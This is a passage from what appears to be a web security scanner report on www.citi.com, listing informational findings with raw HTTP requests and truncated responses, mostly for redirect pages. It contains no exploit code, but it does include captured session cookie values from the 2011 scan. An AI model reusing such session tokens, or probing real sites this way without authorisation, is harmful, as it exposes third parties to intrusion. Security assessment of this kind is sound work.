Cookie: CbolBreadcrumb=.|/cgi-bin/citifi/scripts/|visitor|M_M%3DS|NNNNNNNNNNNNN|NNNNNNNNNNNNNNNNN|0|||https@//online.citibank.com||||; mobiledetect=false; JSESSIONID=s2KTNJThbyTnlpCPtyvkF2zsv2FT5zvpFDmjFtg5yHPRH7JNt5gg!1419886915; CP=null*;

Response

HTTP/1.1 200 OK
Server: ""
Date: Wed, 02 Feb 2011 22:16:48 GMT
Content-length: 659
Content-type: text/html
Last-modified: Thu, 27 Jan 2011 21:06:19 GMT
Etag: "293-4d41de4b"
Accept-ranges: bytes
Connection: close

<html>
<head>
<META HTTP-EQUIV='Pragma' CONTENT='no-cache' />
<META HTTP-EQUIV='Content-Control' CONTENT='no-cache' />
<META HTTP-EQUIV='Cache-Control' CONTENT='no-cache' />
<META HTTP-EQUIV='Expires'
...[SNIP]...

25.41. http://www.citi.com/domain/home.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.citi.com
Path:   /domain/home.htm

Request

GET /domain/home.htm HTTP/1.1
Host: www.citi.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mobiledetect=false; JSESSIONID=R5X5NJTZ3ppnyZvlWDvGgDyfTxKqVG2Q4SL8xGJkwfC4xZlJ8Sds!-455328445

Response

HTTP/1.1 200 OK
Server: ""
Date: Wed, 02 Feb 2011 21:59:53 GMT
Content-length: 41045
Content-type: text/html
Last-modified: Wed, 26 Jan 2011 22:30:23 GMT
Etag: "a055-4d40a07f"
Accept-ranges: bytes
Connection: close

<html>
<head>
<title>Welcome to Citi</title>
<meta name="verify-v1" content="i3jMdURjpVVYm1UnG1lqx4VFWR3tEciWjpjzq5I3doQ=" />
<META HTTP-EQUIV='Pragma' CONTENT='no-cache' />
<META HTTP-EQUIV='Con
...[SNIP]...

25.42. http://www.citi.com/domain/redirect/corp/asst_man.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.citi.com
Path:   /domain/redirect/corp/asst_man.htm

Request

GET /domain/redirect/corp/asst_man.htm HTTP/1.1
Host: www.citi.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CbolBreadcrumb=.|/cgi-bin/citifi/scripts/|visitor|M_M%3DS|NNNNNNNNNNNNN|NNNNNNNNNNNNNNNNN|0|||https@//online.citibank.com||||; mobiledetect=false; JSESSIONID=s2KTNJThbyTnlpCPtyvkF2zsv2FT5zvpFDmjFtg5yHPRH7JNt5gg!1419886915; CP=null*;

Response

HTTP/1.1 200 OK
Server: ""
Date: Wed, 02 Feb 2011 22:16:44 GMT
Content-length: 451
Content-type: text/html
Last-modified: Sun, 06 Oct 2002 03:59:45 GMT
Etag: "1c3-3d9fb531"
Accept-ranges: bytes
Connection: close

<html>
<head>
<title>Redirect - Corporate - Citigroup Asset Management</title>
<script language="JavaScript1.1">
<!--
location.replace("http://citi.bridgetrack.com/_redir.htm?BTData=00E0D6F746C61755F5
...[SNIP]...

25.43. http://www.citi.com/domain/redirect/corp/cdob.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.citi.com
Path:   /domain/redirect/corp/cdob.htm

Request

GET /domain/redirect/corp/cdob.htm HTTP/1.1
Host: www.citi.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CbolBreadcrumb=.|/cgi-bin/citifi/scripts/|visitor|M_M%3DS|NNNNNNNNNNNNN|NNNNNNNNNNNNNNNNN|0|||https@//online.citibank.com||||; mobiledetect=false; JSESSIONID=s2KTNJThbyTnlpCPtyvkF2zsv2FT5zvpFDmjFtg5yHPRH7JNt5gg!1419886915; CP=null*;

Response

HTTP/1.1 200 OK
Server: ""
Date: Wed, 02 Feb 2011 22:16:44 GMT
Content-length: 446
Content-type: text/html
Last-modified: Tue, 19 Feb 2008 16:56:48 GMT
Etag: "1be-47bb0a50"
Accept-ranges: bytes
Connection: close

<html>
<head>
<title>Redirect - Corporate - CitiDirect Online Banking</title>
<script language="JavaScript1.1">
<!--
location.replace("http://www.transactionservices.citigroup.com/transactionservices/
...[SNIP]...

25.44. http://www.citi.com/domain/redirect/corp/cg_sec_svcs.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.citi.com
Path:   /domain/redirect/corp/cg_sec_svcs.htm

Request

GET /domain/redirect/corp/cg_sec_svcs.htm HTTP/1.1
Host: www.citi.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CbolBreadcrumb=.|/cgi-bin/citifi/scripts/|visitor|M_M%3DS|NNNNNNNNNNNNN|NNNNNNNNNNNNNNNNN|0|||https@//online.citibank.com||||; mobiledetect=false; JSESSIONID=s2KTNJThbyTnlpCPtyvkF2zsv2FT5zvpFDmjFtg5yHPRH7JNt5gg!1419886915; CP=null*;

Response

HTTP/1.1 200 OK
Server: ""
Date: Wed, 02 Feb 2011 22:16:47 GMT
Content-length: 420
Content-type: text/html
Last-modified: Sun, 22 Oct 2006 06:37:58 GMT
Etag: "1a4-453b11c6"
Accept-ranges: bytes
Connection: close

<html>
<head>
<title>Redirect - Corporate - Citigroup Securities Services</title>
<script language="JavaScript1.1">
<!--
location.replace("http://www.transactionservices.citigroup.com/transactionservi
...[SNIP]...

25.45. http://www.citi.com/domain/redirect/corp/cgts.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.citi.com
Path:   /domain/redirect/corp/cgts.htm

Request

GET /domain/redirect/corp/cgts.htm HTTP/1.1
Host: www.citi.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CbolBreadcrumb=.|/cgi-bin/citifi/scripts/|visitor|M_M%3DS|NNNNNNNNNNNNN|NNNNNNNNNNNNNNNNN|0|||https@//online.citibank.com||||; mobiledetect=false; JSESSIONID=s2KTNJThbyTnlpCPtyvkF2zsv2FT5zvpFDmjFtg5yHPRH7JNt5gg!1419886915; CP=null*;

Response

HTTP/1.1 200 OK
Server: ""
Date: Wed, 02 Feb 2011 22:16:44 GMT
Content-length: 402
Content-type: text/html
Last-modified: Mon, 18 Jul 2005 20:41:55 GMT
Etag: "192-42dc1413"
Accept-ranges: bytes
Connection: close

<html>
<head>
<title>Redirect - Corporate - Citigroup Global Transaction Services</title>
<script language="JavaScript1.1">
<!--
location.replace("http://www.transactionservices.citigroup.com/transact
...[SNIP]...

25.46. http://www.citi.com/domain/redirect/corp/diners.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.citi.com
Path:   /domain/redirect/corp/diners.htm

Request

GET /domain/redirect/corp/diners.htm HTTP/1.1
Host: www.citi.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CbolBreadcrumb=.|/cgi-bin/citifi/scripts/|visitor|M_M%3DS|NNNNNNNNNNNNN|NNNNNNNNNNNNNNNNN|0|||https@//online.citibank.com||||; mobiledetect=false; JSESSIONID=s2KTNJThbyTnlpCPtyvkF2zsv2FT5zvpFDmjFtg5yHPRH7JNt5gg!1419886915; CP=null*;

Response

HTTP/1.1 200 OK
Server: ""
Date: Wed, 02 Feb 2011 22:16:45 GMT
Content-length: 356
Content-type: text/html
Last-modified: Wed, 09 Jan 2008 16:56:26 GMT
Etag: "164-4784fcba"
Accept-ranges: bytes
Connection: close

<html>
<head>
<title>Redirect - Corporate - Diners Club Corporate</title>
<script language="JavaScript1.1">
<!--
location.replace("http://www.dinersclubus.com/dce_content/corporateproducts");
//-->
</
...[SNIP]...

25.47. http://www.citi.com/domain/redirect/corp/e_biz.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.citi.com
Path:   /domain/redirect/corp/e_biz.htm

Request

GET /domain/redirect/corp/e_biz.htm HTTP/1.1
Host: www.citi.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CbolBreadcrumb=.|/cgi-bin/citifi/scripts/|visitor|M_M%3DS|NNNNNNNNNNNNN|NNNNNNNNNNNNNNNNN|0|||https@//online.citibank.com||||; mobiledetect=false; JSESSIONID=s2KTNJThbyTnlpCPtyvkF2zsv2FT5zvpFDmjFtg5yHPRH7JNt5gg!1419886915; CP=null*;

Response

HTTP/1.1 200 OK
Server: ""
Date: Wed, 02 Feb 2011 22:16:44 GMT
Content-length: 396
Content-type: text/html
Last-modified: Wed, 31 May 2006 17:59:02 GMT
Etag: "18c-447dd966"
Accept-ranges: bytes
Connection: close

<html>
<head>
<title>Redirect - Corporate - Cash Management</title>
<script language="JavaScript1.1">
<!--
location.replace("http://www.transactionservices.citigroup.com/transactionservices/homepage/c
...[SNIP]...

25.48. http://www.citi.com/domain/redirect/corp/exp_bank.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.citi.com
Path:   /domain/redirect/corp/exp_bank.htm

Request

GET /domain/redirect/corp/exp_bank.htm HTTP/1.1
Host: www.citi.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CbolBreadcrumb=.|/cgi-bin/citifi/scripts/|visitor|M_M%3DS|NNNNNNNNNNNNN|NNNNNNNNNNNNNNNNN|0|||https@//online.citibank.com||||; mobiledetect=false; JSESSIONID=s2KTNJThbyTnlpCPtyvkF2zsv2FT5zvpFDmjFtg5yHPRH7JNt5gg!1419886915; CP=null*;

Response

HTTP/1.1 200 OK
Server: ""
Date: Wed, 02 Feb 2011 22:16:47 GMT
Content-length: 309
Content-type: text/html
Last-modified: Tue, 13 Mar 2007 15:39:53 GMT
Etag: "135-45f6c5c9"
Accept-ranges: bytes
Connection: close

<html>
<head>
<title>Redirect - Corporate - Expatriate Banking</title>
<script language="JavaScript1.1">
<!--
location.replace("http://www.citibank.com/geb/global/");
//-->
</script>
   
<noscript>
<met
...[SNIP]...

25.49. http://www.citi.com/domain/redirect/corp/fund_svcs.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.citi.com
Path:   /domain/redirect/corp/fund_svcs.htm

Request

GET /domain/redirect/corp/fund_svcs.htm HTTP/1.1
Host: www.citi.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CbolBreadcrumb=.|/cgi-bin/citifi/scripts/|visitor|M_M%3DS|NNNNNNNNNNNNN|NNNNNNNNNNNNNNNNN|0|||https@//online.citibank.com||||; mobiledetect=false; JSESSIONID=s2KTNJThbyTnlpCPtyvkF2zsv2FT5zvpFDmjFtg5yHPRH7JNt5gg!1419886915; CP=null*;

Response

HTTP/1.1 200 OK
Server: ""
Date: Wed, 02 Feb 2011 22:16:47 GMT
Content-length: 394
Content-type: text/html
Last-modified: Mon, 18 Jul 2005 20:41:55 GMT
Etag: "18a-42dc1413"
Accept-ranges: bytes
Connection: close

<html>
<head>
<title>Redirect - Corporate - Fund Services</title>
<script language="JavaScript1.1">
<!--
location.replace("http://www.transactionservices.citigroup.com/transactionservices/homepage/fun
...[SNIP]...

25.50. http://www.citi.com/domain/redirect/corp/merc_ser.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.citi.com
Path:   /domain/redirect/corp/merc_ser.htm

Request

GET /domain/redirect/corp/merc_ser.htm HTTP/1.1
Host: www.citi.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CbolBreadcrumb=.|/cgi-bin/citifi/scripts/|visitor|M_M%3DS|NNNNNNNNNNNNN|NNNNNNNNNNNNNNNNN|0|||https@//online.citibank.com||||; mobiledetect=false; JSESSIONID=s2KTNJThbyTnlpCPtyvkF2zsv2FT5zvpFDmjFtg5yHPRH7JNt5gg!1419886915; CP=null*;

Response

HTTP/1.1 200 OK
Server: ""
Date: Wed, 02 Feb 2011 22:16:45 GMT
Content-length: 458
Content-type: text/html
Last-modified: Sun, 06 Oct 2002 03:59:45 GMT
Etag: "1ca-3d9fb531"
Accept-ranges: bytes
Connection: close

<html>
<head>
<title>Redirect - Corporate - Credit Card Merchant Services</title>
<script language="JavaScript1.1">
<!--
location.replace("http://citi.bridgetrack.com/usc/_redir.htm?BTData=C02167B7666
...[SNIP]...

25.51. http://www.citi.com/domain/redirect/corp/private.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.citi.com
Path:   /domain/redirect/corp/private.htm

Request

GET /domain/redirect/corp/private.htm HTTP/1.1
Host: www.citi.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CbolBreadcrumb=.|/cgi-bin/citifi/scripts/|visitor|M_M%3DS|NNNNNNNNNNNNN|NNNNNNNNNNNNNNNNN|0|||https@//online.citibank.com||||; mobiledetect=false; JSESSIONID=s2KTNJThbyTnlpCPtyvkF2zsv2FT5zvpFDmjFtg5yHPRH7JNt5gg!1419886915; CP=null*;

Response

HTTP/1.1 200 OK
Server: ""
Date: Wed, 02 Feb 2011 22:16:45 GMT
Content-length: 447
Content-type: text/html
Last-modified: Sun, 06 Oct 2002 03:59:45 GMT
Etag: "1bf-3d9fb531"
Accept-ranges: bytes
Connection: close

<html>
<head>
<title>Redirect - Corporate - Citigroup Private Bank</title>
<script language="JavaScript1.1">
<!--
location.replace("http://citi.bridgetrack.com/_redir.htm?BTData=10E0D6F726D61755F524B4
...[SNIP]...

25.52. http://www.citi.com/domain/redirect/corp/trade_svcs.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.citi.com
Path:   /domain/redirect/corp/trade_svcs.htm

Request

GET /domain/redirect/corp/trade_svcs.htm HTTP/1.1
Host: www.citi.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CbolBreadcrumb=.|/cgi-bin/citifi/scripts/|visitor|M_M%3DS|NNNNNNNNNNNNN|NNNNNNNNNNNNNNNNN|0|||https@//online.citibank.com||||; mobiledetect=false; JSESSIONID=s2KTNJThbyTnlpCPtyvkF2zsv2FT5zvpFDmjFtg5yHPRH7JNt5gg!1419886915; CP=null*;

Response

HTTP/1.1 200 OK
Server: ""
Date: Wed, 02 Feb 2011 22:16:48 GMT
Content-length: 391
Content-type: text/html
Last-modified: Sun, 22 Oct 2006 06:37:58 GMT
Etag: "187-453b11c6"
Accept-ranges: bytes
Connection: close

<html>
<head>
<title>Redirect - Corporate - Trade Services</title>
<script language="JavaScript1.1">
<!--
location.replace("http://www.transactionservices.citigroup.com/transactionservices/homepage/tr
...[SNIP]...

25.53. http://www.citi.com/domain/redirect/search/sm_biz/401k.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.citi.com
Path:   /domain/redirect/search/sm_biz/401k.htm

Request

GET /domain/redirect/search/sm_biz/401k.htm HTTP/1.1
Host: www.citi.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CbolBreadcrumb=.|/cgi-bin/citifi/scripts/|visitor|M_M%3DS|NNNNNNNNNNNNN|NNNNNNNNNNNNNNNNN|0|||https@//online.citibank.com||||; mobiledetect=false; JSESSIONID=s2KTNJThbyTnlpCPtyvkF2zsv2FT5zvpFDmjFtg5yHPRH7JNt5gg!1419886915; CP=null*;

Response

HTTP/1.1 200 OK
Server: ""
Date: Wed, 02 Feb 2011 22:16:41 GMT
Content-length: 464
Content-type: text/html
Last-modified: Sun, 06 Oct 2002 03:59:56 GMT
Etag: "1d0-3d9fb53c"
Accept-ranges: bytes
Connection: close

<html>
<head>
<title>Redirect - Search - Small Business - CitiStreet Success 401(k)</title>
<script language="JavaScript1.1">
<!--
location.replace("http://citi.bridgetrack.com/_redir.htm?BTData=10F0D
...[SNIP]...

25.54. http://www.citi.com/domain/redirect/search/sm_biz/biz_aadv.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.citi.com
Path:   /domain/redirect/search/sm_biz/biz_aadv.htm

Request

GET /domain/redirect/search/sm_biz/biz_aadv.htm HTTP/1.1
Host: www.citi.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CbolBreadcrumb=.|/cgi-bin/citifi/scripts/|visitor|M_M%3DS|NNNNNNNNNNNNN|NNNNNNNNNNNNNNNNN|0|||https@//online.citibank.com||||; mobiledetect=false; JSESSIONID=s2KTNJThbyTnlpCPtyvkF2zsv2FT5zvpFDmjFtg5yHPRH7JNt5gg!1419886915; CP=null*;

Response

HTTP/1.1 200 OK
Server: ""
Date: Wed, 02 Feb 2011 22:16:39 GMT
Content-length: 463
Content-type: text/html
Last-modified: Sun, 06 Oct 2002 03:59:56 GMT
Etag: "1cf-3d9fb53c"
Accept-ranges: bytes
Connection: close

<html>
<head>
<title>Redirect - Search - Small Business - Citi AAdvantage Card</title>
<script language="JavaScript1.1">
<!--
location.replace("http://citi.bridgetrack.com/usc/_redir.htm?BTData=C02167
...[SNIP]...

25.55. http://www.citi.com/domain/redirect/search/sm_biz/biz_plat.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.citi.com
Path:   /domain/redirect/search/sm_biz/biz_plat.htm

Request

GET /domain/redirect/search/sm_biz/biz_plat.htm HTTP/1.1
Host: www.citi.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CbolBreadcrumb=.|/cgi-bin/citifi/scripts/|visitor|M_M%3DS|NNNNNNNNNNNNN|NNNNNNNNNNNNNNNNN|0|||https@//online.citibank.com||||; mobiledetect=false; JSESSIONID=s2KTNJThbyTnlpCPtyvkF2zsv2FT5zvpFDmjFtg5yHPRH7JNt5gg!1419886915; CP=null*;

Response

HTTP/1.1 200 OK
Server: ""
Date: Wed, 02 Feb 2011 22:16:40 GMT
Content-length: 471
Content-type: text/html
Last-modified: Sun, 06 Oct 2002 03:59:56 GMT
Etag: "1d7-3d9fb53c"
Accept-ranges: bytes
Connection: close

<html>
<head>
<title>Redirect - Search - Small Business - CitiBusiness Platinum Select</title>
<script language="JavaScript1.1">
<!--
location.replace("http://citi.bridgetrack.com/usc/_redir.htm?BTDat
...[SNIP]...

25.56. http://www.citi.com/domain/redirect/search/sm_biz/cit_biz.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.citi.com
Path:   /domain/redirect/search/sm_biz/cit_biz.htm

Request

GET /domain/redirect/search/sm_biz/cit_biz.htm HTTP/1.1
Host: www.citi.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CbolBreadcrumb=.|/cgi-bin/citifi/scripts/|visitor|M_M%3DS|NNNNNNNNNNNNN|NNNNNNNNNNNNNNNNN|0|||https@//online.citibank.com||||; mobiledetect=false; JSESSIONID=s2KTNJThbyTnlpCPtyvkF2zsv2FT5zvpFDmjFtg5yHPRH7JNt5gg!1419886915; CP=null*;

Response

HTTP/1.1 200 OK
Server: ""
Date: Wed, 02 Feb 2011 22:16:40 GMT
Content-length: 458
Content-type: text/html
Last-modified: Sun, 06 Oct 2002 03:59:56 GMT
Etag: "1ca-3d9fb53c"
Accept-ranges: bytes
Connection: close

<html>
<head>
<title>Redirect - Search - Small Business - CitiBusiness Global</title>
<script language="JavaScript1.1">
<!--
location.replace("http://citi.bridgetrack.com/_redir.htm?BTData=60B0D6F756D
...[SNIP]...

25.57. http://www.citi.com/domain/redirect/search/sm_biz/citi_cap.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.citi.com
Path:   /domain/redirect/search/sm_biz/citi_cap.htm

Request

GET /domain/redirect/search/sm_biz/citi_cap.htm HTTP/1.1
Host: www.citi.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CbolBreadcrumb=.|/cgi-bin/citifi/scripts/|visitor|M_M%3DS|NNNNNNNNNNNNN|NNNNNNNNNNNNNNNNN|0|||https@//online.citibank.com||||; mobiledetect=false; JSESSIONID=s2KTNJThbyTnlpCPtyvkF2zsv2FT5zvpFDmjFtg5yHPRH7JNt5gg!1419886915; CP=null*;

Response

HTTP/1.1 200 OK
Server: ""
Date: Wed, 02 Feb 2011 22:16:40 GMT
Content-length: 450
Content-type: text/html
Last-modified: Sun, 06 Oct 2002 03:59:56 GMT
Etag: "1c2-3d9fb53c"
Accept-ranges: bytes
Connection: close

<html>
<head>
<title>Redirect - Search - Small Business - CitiCapital</title>
<script language="JavaScript1.1">
<!--
location.replace("http://citi.bridgetrack.com/_redir.htm?BTData=10A0D6F726061755F52
...[SNIP]...

25.58. http://www.citi.com/domain/redirect/search/sm_biz/citibiz.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.citi.com
Path:   /domain/redirect/search/sm_biz/citibiz.htm

Request

GET /domain/redirect/search/sm_biz/citibiz.htm HTTP/1.1
Host: www.citi.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CbolBreadcrumb=.|/cgi-bin/citifi/scripts/|visitor|M_M%3DS|NNNNNNNNNNNNN|NNNNNNNNNNNNNNNNN|0|||https@//online.citibank.com||||; mobiledetect=false; JSESSIONID=s2KTNJThbyTnlpCPtyvkF2zsv2FT5zvpFDmjFtg5yHPRH7JNt5gg!1419886915; CP=null*;

Response

HTTP/1.1 200 OK
Server: ""
Date: Wed, 02 Feb 2011 22:16:40 GMT
Content-length: 454
Content-type: text/html
Last-modified: Sun, 06 Oct 2002 03:59:56 GMT
Etag: "1c6-3d9fb53c"
Accept-ranges: bytes
Connection: close

<html>
<head>
<title>Redirect - Search - Small Business - CitiBusiness US</title>
<script language="JavaScript1.1">
<!--
location.replace("http://citi.bridgetrack.com/_redir.htm?BTData=60A0D6F756C6175
...[SNIP]...

25.59. http://www.citi.com/domain/redirect/search/sm_biz/glance.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.citi.com
Path:   /domain/redirect/search/sm_biz/glance.htm

Request

GET /domain/redirect/search/sm_biz/glance.htm HTTP/1.1
Host: www.citi.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CbolBreadcrumb=.|/cgi-bin/citifi/scripts/|visitor|M_M%3DS|NNNNNNNNNNNNN|NNNNNNNNNNNNNNNNN|0|||https@//online.citibank.com||||; mobiledetect=false; JSESSIONID=s2KTNJThbyTnlpCPtyvkF2zsv2FT5zvpFDmjFtg5yHPRH7JNt5gg!1419886915; CP=null*;

Response

HTTP/1.1 200 OK
Server: ""
Date: Wed, 02 Feb 2011 22:16:39 GMT
Content-length: 511
Content-type: text/html
Last-modified: Wed, 26 Jul 2006 16:31:42 GMT
Etag: "1ff-44c798ee"
Accept-ranges: bytes
Connection: close

<html>
<head>
<title>Redirect - Search - Small Business - At-a-Glance</title>
<script language=javascript src=/domain/scripts/config.js></script>
<script language="JavaScript1.1">
<!--
   location.repla
...[SNIP]...

25.60. http://www.citi.com/domain/redirect/search/sm_biz/merc_ser.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.citi.com
Path:   /domain/redirect/search/sm_biz/merc_ser.htm

Request

GET /domain/redirect/search/sm_biz/merc_ser.htm HTTP/1.1
Host: www.citi.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CbolBreadcrumb=.|/cgi-bin/citifi/scripts/|visitor|M_M%3DS|NNNNNNNNNNNNN|NNNNNNNNNNNNNNNNN|0|||https@//online.citibank.com||||; mobiledetect=false; JSESSIONID=s2KTNJThbyTnlpCPtyvkF2zsv2FT5zvpFDmjFtg5yHPRH7JNt5gg!1419886915; CP=null*;

Response

HTTP/1.1 200 OK
Server: ""
Date: Wed, 02 Feb 2011 22:16:42 GMT
Content-length: 461
Content-type: text/html
Last-modified: Sun, 06 Oct 2002 03:59:56 GMT
Etag: "1cd-3d9fb53c"
Accept-ranges: bytes
Connection: close

<html>
<head>
<title>Redirect - Search - Small Business - Merchant Services</title>
<script language="JavaScript1.1">
<!--
location.replace("http://citi.bridgetrack.com/usc/_redir.htm?BTData=C02167B76
...[SNIP]...

25.61. http://www.citi.com/domain/redirect/search/sm_biz/realest.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.citi.com
Path:   /domain/redirect/search/sm_biz/realest.htm

Request

GET /domain/redirect/search/sm_biz/realest.htm HTTP/1.1
Host: www.citi.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CbolBreadcrumb=.|/cgi-bin/citifi/scripts/|visitor|M_M%3DS|NNNNNNNNNNNNN|NNNNNNNNNNNNNNNNN|0|||https@//online.citibank.com||||; mobiledetect=false; JSESSIONID=s2KTNJThbyTnlpCPtyvkF2zsv2FT5zvpFDmjFtg5yHPRH7JNt5gg!1419886915; CP=null*;

Response

HTTP/1.1 200 OK
Server: ""
Date: Wed, 02 Feb 2011 22:16:41 GMT
Content-length: 456
Content-type: text/html
Last-modified: Sun, 06 Oct 2002 03:59:56 GMT
Etag: "1c8-3d9fb53c"
Accept-ranges: bytes
Connection: close

<html>
<head>
<title>Redirect - Search - Small Business - Real Estate Group</title>
<script language="JavaScript1.1">
<!--
location.replace("http://citi.bridgetrack.com/_redir.htm?BTData=6040D6F726F61
...[SNIP]...

25.62. http://www.citi.com/domain/redirect/search/us.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.citi.com
Path:   /domain/redirect/search/us.htm

Request

GET /domain/redirect/search/us.htm HTTP/1.1
Host: www.citi.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CbolBreadcrumb=.|/cgi-bin/citifi/scripts/|visitor|M_M%3DS|NNNNNNNNNNNNN|NNNNNNNNNNNNNNNNN|0|||https@//online.citibank.com||||; mobiledetect=false; JSESSIONID=s2KTNJThbyTnlpCPtyvkF2zsv2FT5zvpFDmjFtg5yHPRH7JNt5gg!1419886915; CP=null*;

Response

HTTP/1.1 200 OK
Server: ""
Date: Wed, 02 Feb 2011 22:16:43 GMT
Content-length: 367
Content-type: text/html
Last-modified: Tue, 29 Jun 2010 19:01:10 GMT
Etag: "16f-4c2a42f6"
Accept-ranges: bytes
Connection: close

<html>
<head>
<title>Redirect - Search - US Locator</title>
<script language="JavaScript1.1">
<!--
location.replace("http://locations.citibank.com/citibankV2/Index.aspx"+location.search);
//-->
...[SNIP]...

25.63. http://www.citi.com/domain/scripts/config.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.citi.com
Path:   /domain/scripts/config.js

Request

GET /domain/scripts/config.js HTTP/1.1
Host: www.citi.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CbolBreadcrumb=.|/cgi-bin/citifi/scripts/|visitor|M_M%3DS|NNNNNNNNNNNNN|NNNNNNNNNNNNNNNNN|0|||https@//online.citibank.com||||; mobiledetect=false; JSESSIONID=s2KTNJThbyTnlpCPtyvkF2zsv2FT5zvpFDmjFtg5yHPRH7JNt5gg!1419886915; CP=null*;

Response

HTTP/1.1 404 Not found
Server: ""
Date: Wed, 02 Feb 2011 22:16:39 GMT
Content-type: text/html
Connection: close

<HTML>
<HEAD>
   <style>
   <!--
       body {
           background: #fff;
       }
       .notextdecor{
           COLOR: #000099;
           TEXT-DECORATION: none;
       }
       TD{
           COLOR: #000000;
           FONT-FAMILY: verdana, arial, helvetica, sans
...[SNIP]...

25.64. http://www.citi.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.citi.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
Host: www.citi.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=s2KTNJThbyTnlpCPtyvkF2zsv2FT5zvpFDmjFtg5yHPRH7JNt5gg!1419886915; CbolBreadcrumb=.|/cgi-bin/citifi/scripts/|visitor|M_M%3DS|NNNNNNNNNNNNN|NNNNNNNNNNNNNNNNN|0|||https@//online.citibank.com||||; CP=null*

Response

HTTP/1.1 404 Not found
Server: ""
